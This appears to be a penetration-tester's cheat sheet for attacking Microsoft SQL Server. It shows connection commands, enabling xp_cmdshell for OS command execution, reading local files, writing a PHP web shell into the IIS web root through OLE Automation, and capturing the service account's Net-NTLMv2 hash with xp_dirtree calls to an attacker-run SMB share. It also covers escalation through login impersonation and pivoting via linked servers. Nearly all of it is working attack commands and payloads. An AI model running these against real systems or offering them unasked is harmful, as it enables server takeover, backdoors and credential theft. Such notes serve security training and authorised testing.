MSSQL - 1433 (default TCP port; named instances are located through the SQL Browser service on UDP 1434)

  • MSSQL default system databases (present on every instance):

    • master - holds the instance-wide system information: logins, linked servers, endpoints, configuration settings and the location of every other database.

    • msdb - used by SQL Server Agent for scheduling jobs and alerts; also stores backup/restore history.

    • model - a template database copied for each new database.

    • resource - a hidden, read-only database that physically holds the system objects; they are exposed through the sys schema of every database on the server.

    • tempdb - holds temporary objects (temp tables, table variables, work tables) for running queries; it is recreated on every instance restart, so nothing stored there persists.

Interacting with the service

# Linux - SQSH
# Passing -P on the command line leaks the password into shell history and process
# listings (ps); omit -P to be prompted for it instead.
sqsh -S ip -U username -P Password123
# -U .\user logs in as a local Windows account (Windows authentication through FreeTDS);
# -h suppresses sqsh's column headers/footers so output is easier to parse
sqsh -S ip -U .\\julio -P 'MyPassword!' -h

# Windows - SQLCMD
C:\> sqlcmd -S ip -U username -P Password123

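# Useful Commands

# to list the databases
1> SELECT name FROM master.dbo.sysdatabases
2> GO

# Select a database
1> USE users
2> GO

# Show Tables
1> SELECT table_name FROM users.INFORMATION_SCHEMA.TABLES
2> GO

# Select all Data from Table "users"
1> SELECT * FROM users
2> GO

# Execute Commands
# xp_cmdshell is disabled by default and enabling it requires sysadmin (sp_configure +
# RECONFIGURE, instance-wide). For a sysadmin caller the command runs as the SQL Server
# service account. Set it back to 0 when finished.
1> EXEC sp_configure 'show advanced options', 1
2> RECONFIGURE
3> EXEC sp_configure 'xp_cmdshell', 1
4> RECONFIGURE
5> GO
1> xp_cmdshell 'whoami'
2> GO

# Read Local Files in MSSQL
# OPENROWSET(BULK ...) requires the ADMINISTER BULK OPERATIONS permission (bulkadmin or
# sysadmin), and the file is opened as the SQL Server service account - not as the SQL login -
# so only paths that account can read will work.
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO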

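# MSSQL - Enable Ole Automation Procedures
# Requires sysadmin. This is an instance-wide configuration change; set the option
# back to 0 when you are done.
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# MSSQL - Create a File
# T-SQL string literals do not treat backslash as an escape character, so the path is
# written with single backslashes. OpenTextFile arguments: 8 = ForAppending,
# 1 = create the file if it does not exist. The file is written by the SQL Server
# service account, which therefore needs write access to the web root.
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO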

Nmap

# NMAP MSSQL Script Scan
# mssql.password= (empty) tests a blank password for sa. ms-sql-xp-cmdshell and
# ms-sql-dump-hashes only produce output when the supplied credentials are sysadmin-level.
# ms-sql-info also queries the SQL Browser service (UDP/1434), which reveals instances
# listening on non-default TCP ports.
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 ip

Metasploit

# MSSQL Ping in Metasploit using mssql_ping auxiliary scanner
# mssql_ping queries the SQL Server Browser service (UDP/1434) without credentials,
# so it also discovers instances bound to non-default TCP ports.
msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts ip
msf6 auxiliary(scanner/mssql/mssql_ping) > run

Capture the MSSQL service account's Net-NTLMv2 hash (for offline cracking or relaying)

# Start responder or impacket-smbserver - one or the other, not both: each binds TCP/445
# on the attacking host and must be listening before the xp_dirtree/xp_subdirs call below.
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support

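#  XP_DIRTREE Hash Stealing
# SQL Server connects to the UNC path as its own service account, so the captured
# Net-NTLMv2 response belongs to that account. If the service runs as a virtual or
# machine account the hash is not usefully crackable - relay it instead.
# xp_dirtree is usually executable by low-privileged logins, so this does not need
# sysadmin. T-SQL does not escape backslashes: write the UNC path with single ones.
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO

# XP_SUBDIRS Hash Stealing
1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO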

Impersonate Existing Users with MSSQL

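# Identify Users that We Can Impersonate
# For an IMPERSONATE permission in sys.server_permissions the login that can be
# impersonated is the securable (major_id, class SERVER_PRINCIPAL). Joining on
# grantor_principal_id instead lists whoever granted the permission (often sa),
# which is not the same thing. grantee_principal_id is the login that holds the
# permission - compare it with your own login (SUSER_ID()).
1> SELECT DISTINCT b.name AS impersonable_login, c.name AS grantee
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.major_id = b.principal_id
5> INNER JOIN sys.server_principals c
6> ON a.grantee_principal_id = c.principal_id
7> WHERE a.class_desc = 'SERVER_PRINCIPAL'
8> AND a.permission_name = 'IMPERSONATE'
9> GO

# Verifying our Current User and Role
# IS_SRVROLEMEMBER('sysadmin'): 0 = not a member of sysadmin, 1 = member
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> GO

# Impersonating the desired User
# EXECUTE AS LOGIN switches the security context of the session until REVERT is run
1> EXECUTE AS LOGIN = 'User'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

# Return to the original login when done
1> REVERT
2> GO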

Communicate with Other Databases with MSSQL

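# isremote: 1 means remote server, 0 means linked server
# (sysservers is a legacy compatibility view; sys.servers exposes the same data)
# Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO

# Execute Commands using EXECUTE statement
# '10.0.0.12\SQLEXPRESS' is a linked server (single backslash - T-SQL does not escape it)
# Pass-through EXECUTE ... AT requires the linked server's "RPC Out" option to be enabled.
# The query runs under the login mapping configured for the linked server
# (see sys.linked_logins), which is often more privileged than your own login.
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO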

Connecting with Mssqlclient.py

# finding mssqlclient.py (on Kali the packaged wrapper is impacket-mssqlclient)
locate mssqlclient.py

/usr/bin/impacket-mssqlclient
/usr/share/doc/python3-impacket/examples/mssqlclient.py

# To Connect to mssql server with valid creds
# -windows-auth authenticates the login as a Windows (local/domain) account; omit it for
# SQL logins. The target takes [domain/]user[:password]@host - when the password is
# omitted impacket prompts for it, which keeps it out of shell history. Use -port for
# instances not listening on 1433.
python3 mssqlclient.py Administrator@ip -windows-auth

# Useful Commands : <https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/>

# to list the databases
# (sys.databases is the current catalog view; master.dbo.sysdatabases is the legacy compatibility view)
select name from sys.databases
